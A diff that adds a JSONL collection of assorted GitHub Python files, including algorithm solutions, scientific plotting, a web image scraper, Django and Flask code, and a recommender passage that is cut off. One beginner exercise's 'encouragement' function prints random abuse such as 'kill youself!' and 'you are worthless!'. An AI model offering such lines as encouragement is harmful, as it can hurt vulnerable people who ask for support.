diff --git "a/859.jsonl" "b/859.jsonl" new file mode 100644--- /dev/null +++ "b/859.jsonl" @@ -0,0 +1,948 @@ +{"seq_id":"23020228085","text":"class Solution:\n def checkSubarraySum(self, nums: List[int], k: int) -> bool:\n _sum, dic = 0, {0:-1}\n for idx, num in enumerate(nums):\n # k현재까지 합계의 나머지\n _sum = (_sum + num) % k\n # 같은 나머지가 나온다면 이전에 나왔던 위치에서 현재까지 k의 배수가 더해진 것\n # 같은 나머지가 존재하는 위치가 현재 위치와 거리가 2이상이 되어야함:\n if _sum not in dic:\n dic[_sum] = idx\n elif idx - dic[_sum] >= 2:\n return True\n return False","repo_name":"pjaehyun/TIL","sub_path":"PS/leetcode/523.Continuous Subarray Sum.py","file_name":"523.Continuous Subarray Sum.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"10876083205","text":"import random;\n\n# EXCERCISE P1 Q1\ndef exp1q1_encouragement():\n encourage = [\"kill youself!\",\n \"you dishonored your family!\",\n \"you are a disgrace! to the entire humanity\",\n \"you are worthless!\",\n \"no one likes you!\"\n \"shut your computer down and go cry in the corner!\"];\n if str(input(\"would you like an encouragement to brighten up your day? (y/n) \")).lower() == \"y\":\n print(random.choice(encourage));\n\n# EXCERCISE P1 Q2\ndef exp1q2_daysOfWeek():\n days_of_week = [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\",\n \"Friday\", \"Saturday\", \"Sunday\"];\n while True:\n day_number = input(\\\n \"\"\"\n[1] Monday\n[2] Tuesday\n[3] Wednesday\n[4] Thursday\n[5] Friday\n[6] Saturday\n[7] Sunday\\n\"\"\");\n try:\n day_number = int(day_number);\n print(\"\\n\", days_of_week[day_number - 1]);\n break;\n except:\n None;\n\n# EXCERCISE P1 Q3\ndef exp1q3_stringSlice():\n q3_str = \"bothering\";\n print(\"\\n\\n\", q3_str[0:4], \"\\n\",\n q3_str[0:3], \"\\n\",\n q3_str[0:6], \"\\n\",\n q3_str[1:6], \"\\n\",\n q3_str[2:5], \"\\n\",\n q3_str[3:6], \"\\n\",\n q3_str[5:9], \"\\n\",\n q3_str[6:8]);\n\n# EXCERCISE P2 Q1\ndef exp2q1_createList_daysOfWeek():\n \"\"\" Create a list of the days of the week. \"\"\";\n days = [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\",\n \"Friday\", \"Saturday\", \"Sunday\"];\n\n# EXCERCISE P2 Q2\ndef exp2q2_100():\n \"\"\" Create a string of 100 question marks. \"\"\";\n question_str = \"?\" * 100;\n\n# EXCERCISE P2 Q3\ndef exp2q3_asterisks():\n \"\"\" With one line of code print out a row of 50 asterisks '*'. \"\"\";\n print(\"*\" * 50);\n\n# EXCERCISE P2 Q4\ndef exp2q4_testMarks():\n \"\"\" Create a list of 5 test marks entered by the user. \"\"\";\n mark_list = []\n for i in range(5):\n mark_list.append(int(input(\"Test mark for test\", i + 1)));\n print(mark_list);\n\n# EXCERCISE P3 Q1\ndef exp3q1_addFive():\n \"\"\" Create a list and write a function that will add 5 to every\n element in the list. 
\"\"\";\n number_list = [4, 8, 15, 16, 23, 42];\n for i in len(number_list):\n number_list[i - 1] += 5;\n print(number_list);\n\n# EXCERCISE P3 Q2\ndef exp3q2_100randomgen():\n default_list = [];\n even_list = [];\n for i in range(100):\n default_list.append(random.randrange(0, 11));\n\n for j in default_list:\n if j % 2 == 0:\n even_list.append(j);\n\n print(even_list);\n\n# EXCE\n \n \n \nexp1q1_encouragement();\nexp1q2_daysOfWeek();\nexp1q3_stringSlice();\n","repo_name":"FSXAC/PythonSandbox","sub_path":"Harry Ainlay/Assignment - Data Structure Excercises.py","file_name":"Assignment - Data Structure Excercises.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"15377870673","text":"import urllib.request\nimport re\nimport os\n\ndef imageCrawler(url,toPath):\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\"\n }\n req = urllib.request.Request(url,headers=headers)\n response = urllib.request.urlopen(req)\n htmlStr = response.read().decode(\"utf-8\")\n #with open(r\"/Users/jinpeihua/PycharmProjects/Python语言基础视频课程/入门教程一/网络爬虫/file/1haodian.html\",\"wb\") as f:\n #f.write(htmlStr)\n\n pat = r'
\\n'\n re_image = re.compile(pat,re.S)\n imageList = re_image.findall(htmlStr)\n #print(imageList)\n num = 1\n for imageUrl in imageList:\n path = os.path.join(toPath,str(num)+\".jpg\")\n num += 1\n #把图片下载到本地\n urllib.request.urlretrieve(\"http://\"+imageUrl,filename=path)\n\n\nurl = \"http://search.yhd.com/c9719-0-0/mbname-b/a-s1-v0-p1-price-d0-f0-m1-rt0-pid-mid0-color-size-k/\"\ntoPath = \"/Users/jinpeihua/PycharmProjects/Python语言基础视频课程/入门教程一/网络爬虫/file/image\"\n\nimageCrawler(url,toPath)","repo_name":"LasterSmithKim/Python-Base","sub_path":"网络爬虫/爬虫练习/1.屌丝扒女装.py","file_name":"1.屌丝扒女装.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1786828754","text":"import bz2\nimport glob\nimport os\nimport pathlib\nimport warnings\n\nimport numpy as np\nimport pandas as pd\n\nfrom scipy import stats\nfrom matplotlib import pyplot as plt\n\n\ndef get_IMF_data(year_range):\n \"\"\"\n Get OMNI IMF data\n\n Note: IMF data should be pickled with pickle_imf() before calling this.\n An error is raised if no pickled data is found.\n\n Please see pickle_imf() for a more complete description of IMF data and its origins\n\n :param year_range: (int, int):\n Inclusive. The year range to consider.\n\n :return: pandas.Date_Frame:\n A dataframe with the requested data.\n \"\"\"\n\n loc_root = str((pathlib.Path().parent.absolute()))\n if \"data_getters\" in loc_root:\n # We are calling from within lib/data_getters\n loc_root = str((pathlib.Path().parent.absolute().parent.absolute().parent.absolute()))\n if \"lib\" in loc_root:\n # We are calling from within lib\n loc_root = str((pathlib.Path().parent.absolute().parent.absolute()))\n\n in_dir = loc_root + \"/data/omni\"\n print(\"Looking for a pickled file in: \" + in_dir)\n\n for in_file in glob.iglob(in_dir + \"/*.pbz2\"):\n file_name = str(os.path.basename(in_file))\n\n try:\n # Try to pull the required information our of the filename\n file_year_start = int(file_name[9:13])\n file_year_end = int(file_name[14:18])\n\n # Lets see if this file will do the trick\n if file_year_start <= year_range[0] and file_year_end >= year_range[1]:\n # We are good, go ahead and read in the data\n\n warnings.warn(\"Using IMF data from \" + in_file, category=Warning)\n data_stream = bz2.BZ2File(in_file, \"rb\")\n return pd.read_pickle(data_stream)\n\n else:\n continue # This file is not what we are looking for\n except BaseException as e:\n print(\"Base exception encountered: \" + str(e))\n pass\n\n # If we didn't find anything, then we can just go ahead and return None\n raise FileNotFoundError(\"get_IMF_data() could not find a pickled IMF datafile with information from \"\n + str(year_range[0]) + \" to \" + str(year_range[1])\n + \". 
Please pickle data for the desired range using pickle_imf()\")\n\n\nif __name__ == \"__main__\":\n \"\"\" Testing \"\"\"\n\n # Most of the IMF data in both by and bz in the range of -5 to 5 nT\n\n year_range = (2014, 2021)\n\n df = get_IMF_data(year_range=year_range)\n\n print(df.keys())\n\n print(\"\")\n print(\"Minimum Bx value: \" + str(np.min(df['Bx_nT'])) + \" nT (GSM)\")\n print(\"Maximum Bx value: \" + str(np.max(df['Bx_nT'])) + \" nT (GSM)\")\n\n print(\"\")\n print(\"Minimum By value: \" + str(np.min(df['By_nT_GSM'])) + \" nT (GSM)\")\n print(\"Maximum By value: \" + str(np.max(df['By_nT_GSM'])) + \" nT (GSM)\")\n\n print(\"\")\n print(\"Minimum Bz value: \" + str(np.min(df['Bz_nT_GSM'])) + \" nT (GSM)\")\n print(\"Maximum Bz value: \" + str(np.max(df['Bz_nT_GSM'])) + \" nT (GSM)\")\n\n print(\"\")\n print(\"Starting datetime: \" + str(df['datetime'].iat[0]))\n print(\"Ending datetime: \" + str(df['datetime'].iat[-1]))\n\n print(\"\")\n print(\"Temporal data resolution is: \" + str(df['datetime'].iat[1] - df['datetime'].iat[0]))\n\n\n \"\"\" Quickly plot the data so we can look at the spread \"\"\"\n fig, ax = plt.subplots(figsize=[6, 6], nrows=1, ncols=1, constrained_layout=True, dpi=300)\n\n # Compute By edges\n n_bins_x = 40\n by_edges = np.linspace(-10, 10, num=(n_bins_x + 1))\n\n # Compute By edges\n n_bins_y = 40\n bz_edges = np.linspace(-10, 10, num=(n_bins_y + 1))\n\n result, _, _, _ = stats.binned_statistic_2d(df['By_nT_GSM'], df['Bz_nT_GSM'], values=None, statistic='count',\n bins=[by_edges, bz_edges])\n\n plot = ax.pcolormesh(by_edges, bz_edges, result.transpose(), cmap='jet', zorder=0)\n cbar = fig.colorbar(plot, ax=ax, orientation=\"vertical\")\n\n # ax.scatter(df['By_nT_GSM'], df['Bz_nT_GSM'])\n ax.set_xlabel(\"By [nT] (GSM)\")\n ax.set_ylabel(\"Bz [nT] (GSM)\")\n ax.set_title(\"IMF Data Spread\")\n\n plt.show()\n plt.close(fig)\n\n\n \"\"\" Plot year vs IMF so we can see how fast it changes \"\"\"\n x_lim = (2014, 2015)\n\n fig, ax = plt.subplots(figsize=[6, 8], nrows=2, ncols=1, constrained_layout=True, dpi=300)\n fig.suptitle(\"IMF Data Time Evolution\")\n\n # Compute decimal years to plot along x\n print(\"\\nComputing decimal times...\")\n hours_in_a_day = 24\n months_in_a_year = 12\n days_in_a_year = 365\n hours_in_a_year = 8760\n decimal_year, decimal_day = [], []\n for i in range(len(df)):\n datetime_obj_here = df['datetime'].iat[i]\n\n decimal_day_here = datetime_obj_here.day \\\n + (datetime_obj_here.hour + datetime_obj_here.minute / 60) / hours_in_a_day\n\n decimal_year_here = datetime_obj_here.year + (datetime_obj_here.month - 1) / months_in_a_year \\\n + decimal_day_here / days_in_a_year\n\n decimal_day.append(decimal_day_here)\n decimal_year.append(decimal_year_here)\n\n df['decimal_day'] = np.asarray(decimal_day)\n df['decimal_year'] = np.asarray(decimal_year)\n\n print(\"Decimal year max: \" + str(np.amax(df['decimal_year'])))\n print(\"Decimal year min: \" + str(np.amin(df['decimal_year'])))\n\n # Plot the y-component on the first subplot\n ax[0].set_ylabel(\"By [nT] (GSM)\")\n ax[0].set_xlabel(\"Year\")\n ax[0].set_xlim(x_lim)\n ax[0].plot(df['decimal_year'], df['By_nT_GSM'])\n\n # Plot the z-component on the second subplot\n ax[1].set_ylabel(\"Bz [nT] (GSM)\")\n ax[1].set_xlabel(\"Year\")\n ax[1].set_xlim(x_lim)\n ax[1].plot(df['decimal_year'], df['Bz_nT_GSM'])\n\n plt.show()\n plt.close(fig)\n\n\n \"\"\" Plot a couple days of IMF data \"\"\"\n\n fig, ax = plt.subplots(figsize=[6, 12], nrows=8, ncols=1, constrained_layout=True, dpi=300)\n 
fig.suptitle(\"IMF Data Time Evolution\")\n\n for i in range(ax.size):\n ax[i].set_ylabel(\"Bz [nT] (GSM)\")\n ax[i].set_xlabel(\"Day\")\n\n df_dd = df[(df['year'] == 2016) & (df['month'] == 1) & (df['day'] == i + 1)]\n ax[i].plot(df_dd['decimal_day'], df_dd['Bz_nT_GSM'])\n\n plt.show()\n plt.close(fig)\n\n\n\n","repo_name":"mrl280/Summer2021PythonWork","sub_path":"DataAnalysis/EchoOccurrence/lib/data_getters/get_IMF_data.py","file_name":"get_IMF_data.py","file_ext":"py","file_size_in_byte":6281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42100180193","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 12 18:20:02 2019\r\n\r\n@author: Qixin\r\n\"\"\"\r\nimport pandas as pd\r\nimport os\r\nimport glob\r\nimport cv2\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.stats import zscore\r\n#%%\r\npathname=r'Y:\\ChenHaoshan\\11. fiber photometry\\Qixin Yang'\r\nsig_df=pd.read_csv(os.path.join(pathname,'#191113_conditioning.csv'))\r\nbehav_df=pd.read_csv(os.path.join(pathname,'#191113_conditioning_XY.csv')) \r\nextensions=('*.asf','*.avi','*.mp4')\r\nvideos=[]\r\nfor extension in extensions:\r\n videos.append(glob.glob(pathname+'/'+extension)) \r\nvideofile=sorted(videos)[-1][0] \r\n \r\n#%%\r\nsigz=zscore(sig_df['RawF_1'])\r\nplt.figure()\r\nplt.plot(sigz)\r\n#%%\r\nbehav_df=behav_df[:-1]\r\noutput_video=os.path.join(pathname,'sig.avi') \r\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\r\nout = cv2.VideoWriter(output_video,fourcc,30,(640,480)) \r\ncap=cv2.VideoCapture(videofile)\r\nrect,frame=cap.read()\r\nengram=np.zeros(np.shape(frame))\r\ncap.release()\r\ncap=cv2.VideoCapture(videofile)\r\ni=0\r\nratio=0.12\r\nanimal_size=10\r\nwhile(cap.isOpened()):\r\n rect,frame=cap.read()\r\n if rect==True:\r\n if sigz[i]>=2:\r\n frame=cv2.circle(frame,(int(behav_df['X'][i]/ratio), int(behav_df['Y'][i]/ratio)),int(sigz[i]),(0,255,0), -1)\r\n engram[int(behav_df['Y'][i]/ratio)-animal_size:int(behav_df['Y'][i]/ratio)+animal_size,\r\n int(behav_df['X'][i]/ratio)-animal_size:int(behav_df['X'][i]/ratio)+animal_size,\r\n 0]+=int(sigz[i])*5\r\n frame=cv2.addWeighted(frame,1,engram.astype('uint8'),1,0)\r\n out.write(frame)\r\n \r\n cv2.imshow('frame',frame)\r\n i+=1\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n else:\r\n break\r\ncap.release()\r\nout.release()\r\ncv2.destroyAllWindows() ","repo_name":"showholic/Ephy_python-","sub_path":"Ephy_python/Haoshan_photometry/photometry_video.py","file_name":"photometry_video.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31396274769","text":"from django.forms import ModelForm, Select, TextInput\n\nfrom controle_estagios.models import Empresas\nfrom .validacoes import valida_tamanho_string, valida_cnpj, valida_cep, PAISES\n\n\nclass FormEmpresas(ModelForm):\n\n def clean_nome(self):\n nome = self.cleaned_data['nome']\n return valida_tamanho_string('NOME', nome, 3, 150)\n\n def clean_cnpj(self):\n cnpj = self.cleaned_data['cnpj']\n return valida_cnpj(cnpj)\n\n def clean_cep(self):\n cep = self.cleaned_data['cep']\n return valida_cep(cep)\n\n def clean_endereco(self):\n endereco = self.cleaned_data['endereco']\n return valida_tamanho_string('ENDEREÇO', endereco, 3, 150)\n\n def clean_bairro(self):\n bairro = self.cleaned_data['bairro']\n return valida_tamanho_string('BAIRRO', bairro, 3, 50)\n\n def clean_cidade(self):\n cidade = self.cleaned_data['cidade']\n 
return valida_tamanho_string('CIDADE', cidade, 3, 30)\n\n def clean_fone(self):\n fone = self.cleaned_data['fone']\n return valida_tamanho_string('TELEFONE', fone, 0, 13)\n\n class Meta:\n model = Empresas\n fields = '__all__'\n widgets = {\n 'pais': Select(choices=PAISES, attrs={'class': 'form-control'}),\n 'nome': TextInput(attrs={'class': 'form-control', 'placeholder': 'nome'}),\n 'cnpj': TextInput(attrs={'class': 'form-control cnpj-mask', 'placeholder': '00.000.000/0001-00'}),\n 'fone': TextInput(attrs={'class': 'form-control fone-mask', 'placeholder': '(00)0000-0000'}),\n 'cep': TextInput(attrs={'class': 'form-control cep-mask', 'placeholder': '00000-000'}),\n 'endereco': TextInput(attrs={'class': 'form-control', 'placeholder': 'Rua dos bobos'}),\n 'bairro': TextInput(attrs={'class': 'form-control'}),\n 'cidade': TextInput(attrs={'class': 'form-control'}),\n 'complemento': TextInput(attrs={'class': 'form-control', 'placeholder': 'Nº 0'})\n }\n","repo_name":"jefethibes/Estagios","sub_path":"controle_estagios/forms/empresas.py","file_name":"empresas.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4942357308","text":"\n\ndef return_way(mask, last, p, cities):\n if not mask:\n return\n\n return_way(mask - (1 << last), p[mask][last], p, cities)\n cities.append(last + 1)\n return cities\n\n\ndef find_last_city(f, n, p):\n k = len_way = 0\n for i in range(1, n):\n if f[(1 << n) - 1][i] < f[(1 << n) - 1][k]:\n k = i\n len_way = f[(1 << n) - 1][k]\n way = return_way((1 << n) - 1, k, p, [])\n return len_way, way\n\n\ndef tsp(n, a):\n f = [[float('inf')] * n for _ in range(1 << n)]\n p = [[0] * n for _ in range(1 << n)]\n\n for mask in range(1, 1 << n):\n for k in range(0, n):\n if mask == (1 << k):\n f[mask][k] = 0\n\n if mask & (1 << k):\n pm = mask - (1 << k)\n\n for i in range(1, n):\n if f[pm][i] + a[i][k] < f[mask][k]:\n f[mask][k] = f[pm][i] + a[i][k]\n p[mask][k] = i\n\n return find_last_city(f, n, p)\n\n\n\n\n","repo_name":"tfcp68/manual-projects","sub_path":"Исходники/Глава 2. Часть 2/Динамическое программирование2/На множествах/7. 
Коммивояжёр/Python/TSP.py","file_name":"TSP.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6741728055","text":"import datetime\nfrom flask import current_app\nfrom application.admin.models.shipment_weight import ShipmentPrice\nfrom application.admin.models.shipment_spending import ShipmentSpending, db\nimport logging\nimport pandas as pd\nfrom flask import flash\nfrom flask import render_template\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, HiddenField, IntegerField, DateField, FloatField\nfrom application.utils.utils import to_yyyymmdd\n\n\nclass ShipmentSpendingForm(FlaskForm):\n date = DateField(\"Date\", render_kw={\"class\": \"form-control\"}, format='%Y%m%d')\n weight = FloatField(\"Weight\", render_kw={\"class\": \"form-control\", \"pattern\": \"[0-9]+([\\.,][0-9]+)?\", \"step\": \"0.01\"})\n submit = SubmitField(\"Submit\", render_kw={\"class\": \"btn bnt-lg btn-dark\"})\n\n\nclass ShipmentSpendingController:\n def __init__(self):\n shipment_prices = ShipmentPrice.query.filter(ShipmentPrice.end == None).all()\n current_app.logger.info(f\"below are retrieved shipment prices : {shipment_prices}\")\n if len(shipment_prices) > 0:\n self.shipment_per_kg_price = shipment_prices[0].price\n else:\n self.shipment_per_kg_price = 2000\n\n def show_all_spendings(self):\n records = ShipmentSpending.query.order_by(ShipmentSpending.date.desc()).all()\n df = pd.read_sql(ShipmentSpending.query.statement, ShipmentSpending.query.session.bind)\n total_amount = df['amount'].sum()\n return render_template(\"shipment_spending/shipment_spending_main.html\", records=records, total_amount=total_amount, title=\"Shipment spendings\")\n\n def add_shipment_spending(self):\n form = ShipmentSpendingForm()\n if form.validate_on_submit():\n date = form.date.data\n weight = form.weight.data\n amount = weight * self.shipment_per_kg_price\n new_record = ShipmentSpending(date=date, weight=weight, amount=amount)\n db.session.add(new_record)\n db.session.commit()\n flash(f\"Successfully added {date}, {weight}, {amount}\", \"success\")\n return self.show_all_spendings()\n form.date.data = datetime.date.today()\n return render_template(\"shipment_spending/shipment_spending_add.html\", form=form, title=\"Add shipment spending\")\n\n def edit_shipment_spending(self, id):\n record = ShipmentSpending.query.get(id)\n form = ShipmentSpendingForm()\n if form.validate_on_submit():\n date = form.date.data\n weight = form.weight.data\n amount = weight * self.shipment_per_kg_price\n record.date = date\n record.weight = weight\n record.amount = amount\n db.session.commit()\n flash(f\"Updated to {date},{weight},{amount}\", \"success\")\n return self.show_all_spendings()\n form.date.data = record.date\n form.weight.data = record.weight\n return render_template(\"shipment_spending/shipment_spending_edit.html\", form=form, title=\"Edit shipment spending\")\n\n def remove_shipment_spending(self, id):\n record = ShipmentSpending.query.get(id)\n db.session.delete(record)\n db.session.commit()\n flash(f\"Removed id {id}\", \"success\")\n return self.show_all_spendings()\n","repo_name":"samrullo/jspanda_business","sub_path":"application/admin/controllers/shipment_spending_controller.py","file_name":"shipment_spending_controller.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} 
+{"seq_id":"70786045632","text":"#!/usr/bin/env python3\n\nimport argparse\nimport numpy as np\nfrom scipy.special import comb\n\nnp.seterr(all='raise')\n\n\ndef get_combo_rec(l, t, r):\n # base case 1: less than 2 ref\n if l[-1][0] < 2:\n return\n # base case 2: negative alt\n elif l[-1][1] < 0:\n return\n # base case 3: true combination\n elif len(l) == t:\n r.append(l[1:])\n return\n # recursive case\n else:\n # substract blue\\ref\n get_combo_rec(l + [(l[-1][0] - 1, l[-1][1])], t, r)\n # substract red\\alt\n get_combo_rec(l + [(l[-1][0], l[-1][1] - 1)], t, r)\n return r\n\n\ndef get_prob_rec(k, n, a, s, p, inv=-1):\n # base case 1: negative alt\n if k < 0:\n pass\n # base case 2: less than 2 ref\n elif n == 2 and k != 0:\n pass\n elif n - k < 1:\n pass\n else:\n if inv == 0:\n s_plus = np.log((1-a) * k + a * (n - k)) - np.log(n)\n elif inv == 1:\n s_plus = np.log((1-a) * (n - k) + a * k) - np.log(n)\n else:\n s_plus = 0\n # base case 0: too unlikely, prob nearly 0\n if s + s_plus < -20:\n p.append(s + s_plus)\n # base case 3: true combination\n elif n == 2 and k == 0:\n p.append(s + s_plus)\n # recursive case\n else:\n # substract blue\\ref\n get_prob_rec(k, n - 1, a, s + s_plus, p, inv=1)\n # substract red\\alt\n get_prob_rec(k - 1, n - 1, a, s + s_plus, p, inv=0)\n return p\n\n\ndef log_sum(x):\n m = np.max(x)\n s = 0\n for x_i in x:\n if x_i != m:\n s += np.exp(x_i - m)\n return m + np.log1p(s)\n\n\ndef log_norm(x):\n max_i = np.argmax(x)\n x_exp = np.exp(x[np.arange(x.size) != max_i] - x[max_i])\n x_norm = x - x[max_i] - np.log1p(np.sum(x_exp))\n return np.exp(np.clip(x_norm, None, 0))\n\n\ndef get_prob(k, n, a):\n # start = np.log((1-a) * (n - k) + a * k) - np.log(n)\n x = get_prob_rec(k, n, a, 0, [])\n if len(x) > 0:\n return np.exp(log_sum(x))\n else:\n return 0\n\n\ndef get_prob_short(k, n, a):\n no_comb = np.log(comb(n - 2, k))\n try:\n prob_no_error = (n - k - 2) * np.log(1 - a) \\\n + np.log(np.arange(2, n-k)).sum()\n prob_error = np.log(np.arange(0, k) * (1 - a) + (n - k) * a).sum()\n except:\n import pdb; pdb.set_trace()\n norm = np.log(np.arange(2, n)).sum()\n return np.exp(no_comb + prob_no_error + prob_error - norm)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-k', type=int, default='', help='# alt reads')\n parser.add_argument('-n', type=int, help='# total reads.')\n parser.add_argument('-a', type=float, default=0.001, help='Ampl. 
error rate.')\n\n args = parser.parse_args()\n return args\n\n\nif __name__ == '__main__':\n args = parse_args()\n\n print(f'Exact: {get_prob(args.k, args.n, args.a):6f}')\n print(f'Upper bound: {get_prob_short(args.k, args.n, args.a):6f}')\n exit()\n p_all = np.zeros((args.n-1, 2))\n for k in range(0, args.n-1, 1):\n p_all[k, 0] = get_prob(k, args.n, args.a)\n p_all[k, 1] = get_prob_short(k, args.n, args.a)\n print(f'p({k: >2}|{args.n}) = {p_all[k, 0]:.6f}\\t'\n f'(upper bound: {p_all[k, 1]:.6f})')\n print(f'\\nsum: {np.sum(p_all, axis=0)[0]:6f}')","repo_name":"cbg-ethz/scSomMerClock","sub_path":"AnalysisPipelines/scripts/plotting/etc/ampl_error.py","file_name":"ampl_error.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"2831296483","text":"import numpy as np\r\nimport pandas as pd\r\nimport os.path\r\nfrom random import randint\r\nfrom tqdm import tqdm\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport uuid\r\nimport time\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n### NOTES\r\nThis file is an example of what your code should look like. It is written in Python 3.6.\r\nTo know more about the expectations, please refer to the guidelines.\r\n\"\"\"\r\n\r\n#####\r\n##\r\n# DATA IMPORT\r\n##\r\n#####\r\n\r\n\r\n# Where data is located\r\nmovies_file = '../data/movies.csv'\r\nusers_file = '../data/users.csv'\r\nratings_file = '../data/ratings.csv'\r\npredictions_file = '../data/predictions.csv'\r\nsubmission_file = '../data/submission.csv'\r\n\r\n# Read the data using pandas\r\nmovies_description = pd.read_csv(movies_file, delimiter=';',\r\n dtype={'movieID': 'int',\r\n 'year': 'int', 'movie': 'str'},\r\n names=['movieID', 'year', 'movie'])\r\nusers_description = pd.read_csv(users_file, delimiter=';',\r\n dtype={'userID': 'int',\r\n 'gender': 'str',\r\n 'age': 'int',\r\n 'profession': 'int'},\r\n names=['userID', 'gender',\r\n 'age', 'profession'])\r\nratings_description = pd.read_csv(ratings_file, delimiter=';',\r\n dtype={'userID': 'int',\r\n 'movieID': 'int',\r\n 'rating': 'int'},\r\n names=['userID', 'movieID', 'rating'])\r\npredictions_description = pd.read_csv(predictions_file, delimiter=';',\r\n names=['userID', 'movieID'], header=None)\r\n\r\n# The ratings dataframe is missing some movies -\r\n# meaning some movies were not rated by anyone.\r\n# We fix this by joining movies dataframe with\r\n# ratings dataframe and filling the nan values with 0's.\r\nratings = (movies_description.set_index(\"movieID\")).join(\r\n ratings_description.pivot(index='movieID', columns='userID', values='rating'))\r\nratings.drop(['year', 'movie'], axis=1, inplace=True)\r\nratings = ratings.fillna(0)\r\n\r\n#####\r\n##\r\n# COLLABORATIVE FILTERING\r\n##\r\n# In hindsight we want movie-movie collab. filtering.\r\n# For movie x find two other most-similar movies .\r\n# Predict rating x based on neighbours.\r\n#####\r\n\r\n\r\ndef predict_collaborative_filtering(movies, users, ratings, predictions):\r\n # 1. Create a user/movie matrix containing all of the ratings\r\n\r\n # Collaborative filtering can be done in 2 ways: user-item and item-item.\r\n # An easy way to switch between User-Item CF and Item-Item CF:\r\n user_item = True\r\n\r\n # If user_item is true, we have a matrix where rows are users and columns\r\n # are movies. 
The first row of this matrix has ratings\r\n # of user 1 for movies 1-3695\r\n # If user_item is false, then we have a matrix where rows are movies and\r\n # columns are users. The first row of this matrix has ratings of\r\n # movie 1 for users 6040\r\n\r\n if(user_item):\r\n ratings_matrix = ratings.to_numpy().T\r\n else:\r\n ratings_matrix = ratings.to_numpy()\r\n\r\n # 2. Compute the utility matrix containing the similarities\r\n # between users (user_item) or items (item_item)\r\n\r\n # Value of user_item\r\n # similarity_matrix[i][j] = similarity between user i and user j\r\n # similarity_matrix = np.corrcoef(ratings_matrix)\r\n\r\n if (user_item):\r\n similarity_matrix = ratings_matrix.dot(ratings_matrix.T) + 1e-9\r\n else:\r\n similarity_matrix = ratings_matrix.T.dot(ratings_matrix) + 1e-9\r\n norms = np.array([np.sqrt(np.diagonal(similarity_matrix))])\r\n similarity_matrix = similarity_matrix / norms / norms.T\r\n print(similarity_matrix)\r\n\r\n # 3. Compute predictions\r\n if(user_item):\r\n prediction_matrix = similarity_matrix.dot(\r\n ratings_matrix)/np.array([np.abs(similarity_matrix).sum(axis=1)]).T\r\n else:\r\n prediction_matrix = (ratings_matrix.dot(\r\n similarity_matrix)/np.array(\r\n [np.abs(similarity_matrix).sum(axis=1)])).T\r\n # print(predictidon_matrix)\r\n # Creating the final predictions format\r\n number_predictions = len(predictions)\r\n final_predictions = [[idx+1, prediction_matrix[predictions.userID[idx]-1,\r\n predictions.movieID[idx]-1]]\r\n for idx in range(0, number_predictions)]\r\n\r\n return final_predictions\r\n\r\n\r\n#print(predict_collaborative_filtering(\r\n# movies_description,\r\n# users_description,\r\n# ratings_full,\r\n# predictions_description)[0])\r\n\r\n\r\ndef central_cosine_distance(vecA, vecB):\r\n \"\"\"\r\n Calculates Pearsons Correlation between two vectors.\r\n :param vecA: list\r\n :param vecB: list\r\n :return: float\r\n \"\"\"\r\n # meanA = np.mean(vecA)\r\n # meanB = np.mean(vecB)\r\n # sum_numerator = np.sum((vecA - meanA) * (vecB - meanB))\r\n # sum_denominator = np.sqrt(np.sum((vecA - meanA) ** 2)) * np.sqrt(np.sum((vecB - meanB) ** 2))\r\n #\r\n # return sum_numerator/sum_denominator\r\n\r\n # Visa sita padaro np.corrcoef funkcija\r\n return np.corrcoef(vecA, vecB)\r\n\r\n\r\n# print(central_cosine_distance([-2.6, 0, -0.6, 0, -0.6, 0, 0, -1.6, 0, 0, 0.4, 0],\r\n# [-2.6, 0, -0.6, 0, -0.6, 0, 0, -1.6, 0, 0, 0.4, 1]))\r\n\r\ndef predict_rating(s, r):\r\n \"\"\"\r\n Predict rating by taking weighted average of neighbour ratings.\r\n :param s: list\r\n Closest neighbour similarities.\r\n :param r:\r\n Closes neighbour actual ratings for item we want to predict.\r\n :return:\r\n \"\"\"\r\n\r\n sumNumerator = np.sum(np.dot(s, r).ravel())\r\n sumDenominator = np.sum(s)\r\n # Baseline estimate should be added here!!! (baselineEst = overall_mean_rating\r\n # + rating_deviation_of_user\r\n # + (avg. 
